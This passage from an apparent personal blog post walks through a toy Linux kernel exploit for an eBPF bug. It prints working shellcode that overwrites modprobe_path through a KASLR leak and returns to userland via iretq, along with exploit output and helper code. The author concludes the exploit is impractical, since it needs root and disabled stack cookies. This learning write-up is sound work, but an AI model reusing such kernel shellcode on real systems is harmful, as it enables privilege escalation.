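Plugging in the numbers from the debugger dump, resolve_target(0xffffffff81415472, 0x698f4e) comes out to 0xffffffff81aae3c0. That address is only the sum of those two values, not something printed anywhere in this post. Adding the same slide to both the leak and the target leaves the offset unchanged, which is why the shellcode only needs the one constant.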

Here's the exploit shellcode. It is very standard - note that at the beginning of the program, we already do all the necessary work of saving userland's cs, ss, rsp and rflags somewhere. We just take this shellcode afterwards and chuck it into the mmap'd page.

volatile void trampoline() {
    // Intel syntax, so presumably built with -masm=intel
    __asm__(
        ".fill 0x50, 0x01, 0x90\n"              // nop sled
        "mov rdi, 0x698f4e\n"                   // modprobe path offset
        "mov r10, qword ptr [rsp + 0x170]\n"    // kaslr leak
        "add r10, rdi\n"                        // r10 = &modprobe_path
        "mov rdi, 0x612f706d742f\n"             // "/tmp/a" as a little-endian qword
        "mov qword ptr [r10], rdi\n"            // overwrite modprobe_path
        "swapgs\n"                              // back to the userland gs base
        "movabs rax, user_ss\n"                 // build the iretq frame: ss
        "push rax\n"
        "movabs rax, user_sp\n"                 // rsp
        "push rax\n"
        "movabs rax, user_rflags\n"             // rflags
        "push rax\n"
        "movabs rax, user_cs\n"                 // cs
        "push rax\n"
        "mov rax, 0x500000000\n"                // chain[0] holds &exit_safely
        "mov rdx, qword ptr [rax]\n"
        "push rdx\n"                            // rip
        "iretq\n"
    );
}
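
In case the 0x612f706d742f constant looks like magic: it's just the string "/tmp/a" packed into a qword, so that a single 8-byte store writes the path plus its NUL terminator. Here's a small sketch of the packing. The helper name is made up for illustration, and it assumes a little-endian target.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: pack a short path into the 64-bit immediate that
 * one little-endian qword store would write. Byte 0 of the string goes in
 * the lowest byte; unused high bytes stay zero and act as the terminator. */
static uint64_t pack_path_qword(const char *path)
{
    size_t len = strlen(path);
    uint64_t imm = 0;

    assert(len < 8); /* keep at least one zero byte for the NUL */
    for (size_t i = 0; i < len; i++)
        imm |= (uint64_t)(unsigned char)path[i] << (8 * i);
    return imm;
}
```

pack_path_qword("/tmp/a") gives 0x612f706d742f, which matches the immediate in the shellcode. Anything longer than 7 characters would need a second store.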

Now, everything works nicely :)


/ # ./exploit
hello vro
[!] initialising...
[!] wrote trampoline
[+] devmap fd=3
[+] prog fd=4
[!] creating macvlans
[+] link_fd=5
[+] sleeping for 3 seconds to wait for modprobe overwrite
BUG: scheduling while atomic: kworker/0:0/6/0x00000101
[!] modprobe path > /tmp/a
      

As an aside, for some reason I really like the LLM-ism of having cute little '[+]' and '[!]' symbols next to your exploit code, so I just started doing it myself. Some of the LPEs that have been released lately have such cool terminal output, especially the CopyFail-esque stuff where the stale page bytes are pretty-printed in real time as they're overwritten. It's so aura... I wish I could do something similar, but this particular exploit doesn't lend itself well to a graphic presentation.

Also, note that BUG: scheduling while atomic. Uhh, I have no idea why this happens, lol! It doesn't break the exploit and I don't care to find out at this juncture. Maybe someone smarter can figure that out.

Final steps

Initially I wanted to explore a cool modprobe_path technique I was shown through this article. It turns out that the classic strategy of making a garbage executable file with junk header bytes doesn't work to trigger modprobe_path execution. However, this post already took like two weeks to write, and laziness overcame me. I figured that demonstrating a modprobe path overwrite was good enough.

The final trick is to make sure that it works with kASLR. The way I wrote it, it certainly should have, but kASLR always fucks things up. I quickly changed nokaslr to kaslr in my qemu script and ran it, and to my surprise, it worked immediately! Wow! I'm a brilliant exploit developer.

That is, until I thought about it for maybe 3 more seconds, saw that my vmlinux symbols were still mapping properly to actual functions, and realised... ah... I'm chopped... CONFIG_RELOCATABLE=y, CONFIG_RANDOMIZE_BASE=y. Meaning, kASLR is also a kernel configuration. Glup...


/ # cat /proc/kallsyms | grep modprobe
ffffffff91e7cc70 t free_modprobe_argv
ffffffff926ae3c0 D modprobe_path
/ # ./exploit
hello vro
[!] initialising...
[!] wrote trampoline
[+] devmap fd=3
[+] prog fd=4
[!] creating macvlans
[+] link_fd=5
[+] sleeping for 3 seconds to wait for modprobe overwrite
BUG: scheduling while atomic: kworker/0:1/8/0x00000101
[!] modprobe path > /tmp/a

But hey, once I got that sorted, it did work (after some light debugging)! For real, for real this time. Now that kASLR was out of the way, the final step was to test it as a non-root user.

Komm, süsser Tod

This is my last kernel config ragebait of the day, I promise. When I tried running whoami, it seemed that the utility was unsupported. I learned that this is because having multiple users, in and of itself, is its own config. (By default, with CONFIG_MULTIUSER not enabled, only the root user exists). That one was especially embarrassing to learn, but this project was already really embarrassing anyway.

So, I recompiled my darling Linux kernel for the last ever time, and fired off my exploit.


/ $ ./exploit
hello vro
[!] initialising...
[!] wrote trampoline
[+] devmap fd=-1
BPF_PROG_LOAD failed: Operation not permitted

[+] sleeping for 3 seconds to wait for modprobe overwrite
[!] modprobe path > /sbin/modprobe
      

Ah... hah? What? Maybe it's like a, consistency thing? Haha? Did I miss another kernel config?

It was at this juncture that I realized that creating eBPF programs and loading them is already a privileged action. You would only be capable of exploiting this bug to get root if you were already root.
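
A pre-flight check would have saved me a few days here. Below is a rough sketch of one, working from the CapEff line of /proc/self/status. The function names are hypothetical. The rule it encodes is an assumption on my part: that the program is a networking-type one (the devmap usage suggests XDP), and that loading it needs either CAP_SYS_ADMIN or both CAP_BPF and CAP_NET_ADMIN. It deliberately ignores everything else, such as sysctls and LSMs.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Capability numbers as defined in <linux/capability.h>. */
#define CAP_NET_ADMIN_NR 12
#define CAP_SYS_ADMIN_NR 21
#define CAP_BPF_NR       39

/* Pull the effective capability bitmask out of the text of
 * /proc/self/status. Returns 0 if the CapEff field is missing. */
static uint64_t parse_capeff(const char *status_text)
{
    const char *p = strstr(status_text, "CapEff:");
    if (!p)
        return 0;
    /* strtoull skips the tab that follows the field name. */
    return strtoull(p + strlen("CapEff:"), NULL, 16);
}

static int has_cap(uint64_t capeff, int cap_nr)
{
    return (int)((capeff >> cap_nr) & 1);
}

/* Hypothetical check, under the assumption stated above. */
static int can_probably_load_net_bpf(uint64_t capeff)
{
    if (has_cap(capeff, CAP_SYS_ADMIN_NR))
        return 1;
    return has_cap(capeff, CAP_BPF_NR) && has_cap(capeff, CAP_NET_ADMIN_NR);
}
```

An ordinary user has a CapEff of all zeroes, so can_probably_load_net_bpf returns 0, which lines up with the "Operation not permitted" in the output above.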

I would like to emphasise that I realised this when the project was already fully complete, which took around 4 days of work on-and-off. Reader, I am not ragebaiting this time, I genuinely had a fully working exploit before it occurred to me that - hmm, eBPF programs are already really powerful, surely there must be some permission restriction on them. They make rootkits with these for fuck's sake! I genuinely remember reading through this thesis on an eBPF rootkit where they talk about the privileges at hand, and somehow this entire thing just slipped my mind.

To be clear, I had no false pretenses about the validity of this exploit actually working on any system up til now - I knew this was bullshit the instant I had to disable stack cookies. No kernel on earth is shipping both with eBPF support and no stack cookies! Not a single fucking one! But this was a beautiful bow to tie on top of it all. It's almost comedic how utterly useless this is, and how much time I still spent on it despite that.

So, uh. Pwn, huh? What did we learn?

  1. I really might be very stupid,
  2. In terms of pwn, basically nothing, because the exploit was super simple,
  3. Everything is a Linux configuration,
  4. I'm chopped, gay, and emo.

Great! To be honest, it seems like 2026 is the year of these bullshit exploits. Agents seem to really like cheating and finding "vulnerabilities" where they really bury the lede about how it would only work if ASLR were disabled. Like, no shit, buddy! Everything would work if ASLR was disabled, and everything would work if you had an LFI leak on /proc/self/maps! I think my favorite instance of this was a DEFCON challenge wherein an AI hallucinated that musl base and PIE base were a constant offset from one another because gdb specifically standardises those offsets during debugging. In any case, I'm happy to join the hallowed company of all those fake nginx "RCE"s. This is what real research looks like in the big '26.

Concluding

Writing this post I was a bit conflicted - I had fun, and I think it's a cool project, but also, like, it's very technically uninteresting and lame. We didn't even talk about kmalloc()! There's a whole world in the kernel here! They got some shit called SLAB and some other shit called SLUB! What the hell?

I think if you know anything about kernel pwn, you will come away from this having learned nothing. Then, I think if you know nothing about kernel pwn, you will also have come away from this learning nothing. I was really wondering who my audience was for this (there is none) so I figured - not all posts need to be educational, maybe someone will find a bit of joy at my expense.

I was going to open-source my work here, but I'm super lazy. I guess if you ever want to fuck around with these files or anything, let me know and I will throw these your way. I don't really see the point in putting this up on Github or anything, and also, it's very embarrassing.

But, you know, I had a good time. I think it's always good practice to stop fucking around and playing with toys and try to do some real shit for once, and get acquainted with the wonderful Real World. I encourage it!

Reward for reaching the end of this post